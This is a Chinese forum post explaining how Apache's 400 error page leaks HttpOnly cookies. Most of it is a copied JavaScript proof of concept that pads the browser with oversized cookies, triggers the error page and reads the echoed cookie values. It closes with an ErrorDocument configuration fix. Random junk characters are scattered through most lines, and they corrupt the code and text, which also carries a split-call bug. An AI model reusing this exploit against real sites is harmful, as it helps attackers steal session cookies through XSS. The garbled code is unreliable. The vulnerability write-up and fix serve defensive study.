很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
' Y1 ~6 T g& f, \; V8 h5 s
) \' c4 P" x! g2 Z, R& A8 W, V& ]用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
9 L, c5 V/ j7 D$ b' ] 9 T+ B# W' s5 W$ T, P l$ B
, D; c) b; V" ]7 _6 j) D. G/ E
// http://www.exploit-db.com/exploits/18442/
D8 h, q) Z& A7 h/ H0 lfunction setCookies (good) {
8 X F1 }; z. h6 k1 h// Construct string for cookie value- e7 ~" Q' p2 `) s, t2 Q
var str = "";
' g" a3 c3 Q. z* @for (var i=0; i< 819; i++) {
. R" x. o8 K9 d9 f7 M/ ^# P6 E estr += "x";
. Q+ O9 [' N$ s3 J1 g( R}
! V* v, L% n: ~' Z8 h+ q( [// Set cookies
( L5 |' e {6 {' m; E9 M7 G% yfor (i = 0; i < 10; i++) {
, }* ~& b( ?& Q) ~- X7 B- u// Expire evil cookie
: A% b1 @2 W3 Lif (good) {
* Y o6 t$ k6 q1 b5 Evar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";: `" L2 w) \" D) n( r
}
# u$ h! S7 ^/ h0 s% o- j( v9 f6 p// Set evil cookie
# e8 X% s7 }! Y3 `8 Delse {6 c0 H0 ]/ S+ p' A
var cookie = "xss"+i+"="+str+";path=/";
m! d7 I1 P7 @0 o# S5 r6 N7 [! W}
0 M' j( T" s! Q7 ]& I1 bdocument.cookie = cookie;& M7 y# g3 d7 Y+ H( T7 ?! d
}3 ]" G/ k, u: D7 t; D
}: z7 y7 U2 {2 V" V1 r1 P6 N8 o) K. n
function makeRequest() {
/ M7 }5 v0 _# P2 P4 y: i+ asetCookies();9 F) d3 C j, T/ C6 ^
function parseCookies () {: T- r5 [4 I6 ^% V: F
var cookie_dict = {};) p: W9 C7 s, S( J W
// Only react on 400 status7 k5 |' G( ?0 \" ?; c1 [5 u
if (xhr.readyState === 4 && xhr.status === 400) {0 O9 c; x0 |; b, o$ S/ M
// Replace newlines and match <pre> content I3 i( ?: b* Q ]
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);6 @; E9 O" T8 _2 ? ~
if (content.length) {
7 X3 o$ e* `6 @: {8 f: ]// Remove Cookie: prefix9 [$ O2 t5 w+ S& _, l! F4 @. g0 w
content = content[1].replace("Cookie: ", "");3 O& o3 W! A c1 `9 d4 l; }
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
3 E# K/ t0 ]" `0 N// Add cookies to object
0 @ V% f* X6 j) Ffor (var i=0; i<cookies.length; i++) {
) |& d! _. E0 j3 s; Y" J$ W" W; ivar s_c = cookies.split('=',2);1 t! d0 ^+ u7 {) w$ a ?0 S
cookie_dict[s_c[0]] = s_c[1];
9 h1 \2 o: v3 I3 d+ W) B. A}
: Z& {, ]1 G! @) X, ]4 B v+ p}
$ `# O" I& ^2 }) {" O$ H// Unset malicious cookies
1 W; ?% _5 q& k- y" JsetCookies(true);7 U4 h* F" y5 |0 ~
alert(JSON.stringify(cookie_dict));
; `* M& A, p* Y( Z}
& }2 {) r1 ~! D4 P F$ B+ f}# j0 m; K0 M$ }3 y- \
// Make XHR request$ o+ s* F9 H# r
var xhr = new XMLHttpRequest();
- a* Q* W$ U, c% \; \/ Y1 |1 mxhr.onreadystatechange = parseCookies;; M% g1 ~4 P9 V& W# }
xhr.open("GET", "/", true);5 ?" _5 _9 X c- J) [
xhr.send(null);, K' N$ Y2 i1 i$ t
}
" W% \5 A: U0 x5 N* r& w2 k& emakeRequest();
" h1 ?0 j6 T/ U8 y" _- ~9 I' F; c1 R) s9 j6 }
你就能看见华丽丽的400错误包含着cookie信息。" U3 W: V j8 b
" v/ q. z0 l; R& f: z; `" ^5 ~! l
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#/ B% ]7 ?" k# e3 y; |( E2 |
1 @5 [8 b! Z& M& m; a6 @+ a) O
修复方案:
& x* n3 m, d- _" k( Q! y( Z: S0 V: Z; o6 b. [" u! z2 b! O
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
% w# z6 j$ G9 ]# u* f
0 \. y9 W! f/ w# ~ ZIn the event of a problem or error, Apachecan be configured to do one of four things,; r( ]* ~; A3 w
" G' S$ b& m: J" \1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
5 k6 f7 p4 I( J3 a2. output acustomized message输出一段信息5 X+ |! X5 B2 p4 a4 r
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 1 b! i# z, j& r
4. redirect to an external URL to handle theproblem/error转向一个外部URL
B7 C: T1 N, U6 b2 W
* {0 @' t- q0 D4 ~3 v- O& {+ T经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
/ z( v, v. f# H% ]+ r
! `# l( O( {+ L* r8 E( yApache配置:4 @" ^ M1 ?7 m4 ]+ I
* ~3 |8 k3 p6 S" }8 S5 X2 H9 c! dErrorDocument400 " security test": y0 n( V8 I/ [0 k" L* @/ a3 W
4 ^" D2 A- l( |! C% ~当然,升级apache到最新也可:)。
+ L1 o1 C8 p/ \4 C& O7 I; K) W8 W0 R8 B% u( i+ j
参考:http://httpd.apache.org/security/vulnerabilities_22.html6 P4 _8 r" ]! B9 y8 H1 K
8 T& s% Z1 P) Q6 K. l( x! Z y
|
发表于 2013-4-19 19:15:43
收藏
支持
反对